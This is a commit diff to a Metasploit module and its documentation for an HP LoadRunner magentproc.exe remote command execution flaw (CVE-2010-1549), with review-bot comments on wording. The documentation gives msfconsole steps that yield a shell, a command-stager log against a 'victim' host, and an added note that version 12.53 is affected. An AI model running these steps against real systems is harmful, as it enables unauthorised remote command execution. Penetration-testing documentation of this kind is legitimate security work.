Commit b698095

slight updates to magentproc docs
1 parent d95b333 commit b698095

2 files changed

+15
-71
lines changed

documentation/modules/exploit/windows/misc/hp_loadrunner_magentproc_cmdexec.md

Lines changed: 11 additions & 67 deletions
@@ -1,29 +1,29 @@
11
HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution (CVE-2010-1549)
22

3-
This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50 and also HP Performance Center before 9.50. By sending a specially crafted packet, an attacker can execute commands remotely. The service is vulnerable provided the Secure Channel feature is disabled (default).
3+
This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50 and also
4+
HP Performance Center before 9.50. By sending a specially crafted packet, an attacker can execute commands remotely.
5+
The service is vulnerable provided the Secure Channel feature is disabled (default).
46

5-
## Vulnerable Application
7+
During testing, additional versions were verified to be vulnerable. The following list documents them:
8+
9+
- HP LoadRunner 12.53 Community Edition (non-default SSL turned off)
610

7-
HP LoadRunner 9.50 or below.
11+
## Vulnerable Application
812

9-
Sources unknown - written during blind pentest against remote target.
13+
HP LoadRunner 9.50 or below, or a version documented above.
1014

1115
## Verification Steps
1216

1317
1. Install the application
1418
2. Start msfconsole
1519
3. Do: ```use exploit/windows/misc/hp_loadrunner_magentproc_cmdexec```
16-
4. Do: ```set RHOST victim```
20+
4. Do: ```set RHOST [ip]```
1721
5. Do: ```run```
1822
6. You should get a shell.
1923

20-
## Options
21-
22-
Default RPORT 54345.
23-
2424
## Scenarios
2525

26-
### Win7 OS with unknown vulnerable release of LoadRunner Agent
26+
### Win7 OS with HP LoadRunner 12.53 Community Edition
2727

2828
```
2929
msf > use exploit/windows/misc/hp_loadrunner_magentproc_cmdexec
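
Review bot: The new list entry at line 9, "HP LoadRunner 12.53 Community Edition (non-default SSL turned off)", conflicts with line 5, which still says the service is vulnerable when Secure Channel is "disabled (default)", so a reader cannot tell whether the exposed configuration on 12.53 is the default or an opt-out. Suggest stating for each listed version whether the insecure setting is the default, and whether "SSL" and "Secure Channel" refer to the same option. Two smaller points in the same hunk: line 13 says "9.50 or below" while line 3 says "before 9.50", and the "vulnerablity" typo on line 3 is re-wrapped but not corrected.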
@@ -38,63 +38,7 @@ msf exploit(hp_loadrunner_magentproc_cmdexec) > exploit
3838
[*] victim:54345 - Command Stager progress - 4.40% done (4497/102292 bytes)
3939
[*] victim:54345 - Command Stager progress - 5.86% done (5996/102292 bytes)
4040
[*] victim:54345 - Command Stager progress - 7.33% done (7495/102292 bytes)
41-
[*] victim:54345 - Command Stager progress - 8.79% done (8994/102292 bytes)
42-
[*] victim:54345 - Command Stager progress - 10.26% done (10493/102292 bytes)
43-
[*] victim:54345 - Command Stager progress - 11.72% done (11992/102292 bytes)
44-
[*] victim:54345 - Command Stager progress - 13.19% done (13491/102292 bytes)
45-
[*] victim:54345 - Command Stager progress - 14.65% done (14990/102292 bytes)
46-
[*] victim:54345 - Command Stager progress - 16.12% done (16489/102292 bytes)
47-
[*] victim:54345 - Command Stager progress - 17.58% done (17988/102292 bytes)
48-
[*] victim:54345 - Command Stager progress - 19.05% done (19487/102292 bytes)
49-
[*] victim:54345 - Command Stager progress - 20.52% done (20986/102292 bytes)
50-
[*] victim:54345 - Command Stager progress - 21.98% done (22485/102292 bytes)
51-
[*] victim:54345 - Command Stager progress - 23.45% done (23984/102292 bytes)
52-
[*] victim:54345 - Command Stager progress - 24.91% done (25483/102292 bytes)
53-
[*] victim:54345 - Command Stager progress - 26.38% done (26982/102292 bytes)
54-
[*] victim:54345 - Command Stager progress - 27.84% done (28481/102292 bytes)
55-
[*] victim:54345 - Command Stager progress - 29.31% done (29980/102292 bytes)
56-
[*] victim:54345 - Command Stager progress - 30.77% done (31479/102292 bytes)
57-
[*] victim:54345 - Command Stager progress - 32.24% done (32978/102292 bytes)
58-
[*] victim:54345 - Command Stager progress - 33.70% done (34477/102292 bytes)
59-
[*] victim:54345 - Command Stager progress - 35.17% done (35976/102292 bytes)
60-
[*] victim:54345 - Command Stager progress - 36.64% done (37475/102292 bytes)
61-
[*] victim:54345 - Command Stager progress - 38.10% done (38974/102292 bytes)
62-
[*] victim:54345 - Command Stager progress - 39.57% done (40473/102292 bytes)
63-
[*] victim:54345 - Command Stager progress - 41.03% done (41972/102292 bytes)
64-
[*] victim:54345 - Command Stager progress - 42.50% done (43471/102292 bytes)
65-
[*] victim:54345 - Command Stager progress - 43.96% done (44970/102292 bytes)
66-
[*] victim:54345 - Command Stager progress - 45.43% done (46469/102292 bytes)
67-
[*] victim:54345 - Command Stager progress - 46.89% done (47968/102292 bytes)
68-
[*] victim:54345 - Command Stager progress - 48.36% done (49467/102292 bytes)
69-
[*] victim:54345 - Command Stager progress - 49.82% done (50966/102292 bytes)
70-
[*] victim:54345 - Command Stager progress - 51.29% done (52465/102292 bytes)
71-
[*] victim:54345 - Command Stager progress - 52.75% done (53964/102292 bytes)
72-
[*] victim:54345 - Command Stager progress - 54.22% done (55463/102292 bytes)
73-
[*] victim:54345 - Command Stager progress - 55.69% done (56962/102292 bytes)
74-
[*] victim:54345 - Command Stager progress - 57.15% done (58461/102292 bytes)
75-
[*] victim:54345 - Command Stager progress - 58.62% done (59960/102292 bytes)
76-
[*] victim:54345 - Command Stager progress - 60.08% done (61459/102292 bytes)
77-
[*] victim:54345 - Command Stager progress - 61.55% done (62958/102292 bytes)
78-
[*] victim:54345 - Command Stager progress - 63.01% done (64457/102292 bytes)
79-
[*] victim:54345 - Command Stager progress - 64.48% done (65956/102292 bytes)
80-
[*] victim:54345 - Command Stager progress - 65.94% done (67455/102292 bytes)
81-
[*] victim:54345 - Command Stager progress - 67.41% done (68954/102292 bytes)
82-
[*] victim:54345 - Command Stager progress - 68.87% done (70453/102292 bytes)
83-
[*] victim:54345 - Command Stager progress - 70.34% done (71952/102292 bytes)
84-
[*] victim:54345 - Command Stager progress - 71.81% done (73451/102292 bytes)
85-
[*] victim:54345 - Command Stager progress - 73.27% done (74950/102292 bytes)
86-
[*] victim:54345 - Command Stager progress - 74.74% done (76449/102292 bytes)
87-
[*] victim:54345 - Command Stager progress - 76.20% done (77948/102292 bytes)
88-
[*] victim:54345 - Command Stager progress - 77.67% done (79447/102292 bytes)
89-
[*] victim:54345 - Command Stager progress - 79.13% done (80946/102292 bytes)
90-
[*] victim:54345 - Command Stager progress - 80.60% done (82445/102292 bytes)
91-
[*] victim:54345 - Command Stager progress - 82.06% done (83944/102292 bytes)
92-
[*] victim:54345 - Command Stager progress - 83.53% done (85443/102292 bytes)
93-
[*] victim:54345 - Command Stager progress - 84.99% done (86942/102292 bytes)
94-
[*] victim:54345 - Command Stager progress - 86.46% done (88441/102292 bytes)
95-
[*] victim:54345 - Command Stager progress - 87.92% done (89940/102292 bytes)
96-
[*] victim:54345 - Command Stager progress - 89.39% done (91439/102292 bytes)
97-
[*] victim:54345 - Command Stager progress - 90.86% done (92938/102292 bytes)
41+
...snip...
9842
[*] victim:54345 - Command Stager progress - 92.32% done (94437/102292 bytes)
9943
[*] victim:54345 - Command Stager progress - 93.79% done (95936/102292 bytes)
10044
[*] victim:54345 - Command Stager progress - 95.25% done (97435/102292 bytes)
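
Review bot: The transcript lines kept on either side of the new `...snip...` at line 41 are unchanged context, yet the scenario heading in the previous hunk was renamed to "Win7 OS with HP LoadRunner 12.53 Community Edition". Please confirm this output was actually captured against 12.53, or re-capture it, so the heading does not overstate what the log demonstrates. The retained lines also still show `victim:54345` while the verification steps now use `[ip]`; pick one placeholder for the whole document.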

modules/exploits/windows/misc/hp_loadrunner_magentproc_cmdexec.rb

Lines changed: 4 additions & 4 deletions
@@ -14,9 +14,10 @@ def initialize(info={})
1414
'Name' => "HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution",
1515
'Description' => %q{
1616
This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50
17-
and also HP Performance Center before 9.50. By sending a specially crafted packet, an
18-
attacker can execute commands remotely. The service is vulnerable provided the Secure
19-
Channel feature is disabled (default).
17+
and also HP Performance Center before 9.50. HP LoadRunner 12.53 and other versions are
18+
also most likely vulneable if the (non-default) SSL option is turned off.
19+
By sending a specially crafted packet, an attacker can execute commands remotely.
20+
The service is vulnerable provided the Secure Channel feature is disabled (default).
2021
},
2122
'License' => MSF_LICENSE,
2223
'Author' =>
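
Review bot: Added line 18 contains the typo "vulneable", and the unchanged line 16 still reads "vulnerablity"; fix both while the description is being edited. Lines 17-18 also hedge with "most likely" and "other versions", whereas the documentation change in this commit says 12.53 Community Edition was verified during testing. Suggest naming only the verified version here. The same default versus non-default tension appears between line 18 ("(non-default) SSL option is turned off") and line 20 ("Secure Channel feature is disabled (default)") and should be reconciled in one sentence.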
@@ -29,7 +30,6 @@ def initialize(info={})
2930
['CVE', '2010-1549'],
3031
['ZDI', '10-080'],
3132
['BID', '39965'],
32-
#['OSVDB', ''], # ?
3333
['URL', 'https://support.hpe.com/hpsc/doc/public/display?docId=c00912968']
3434
],
3535
'Payload' => { 'BadChars' => "\x0d\x0a\x00" },
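
Review bot: Dropping the commented-out `#['OSVDB', ''], # ?` placeholder at old line 32 is fine, but the commit message mentions only docs while this hunk and the previous one change the module file itself. Suggest noting the module description and reference cleanup in the commit message so the change is discoverable from the log.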
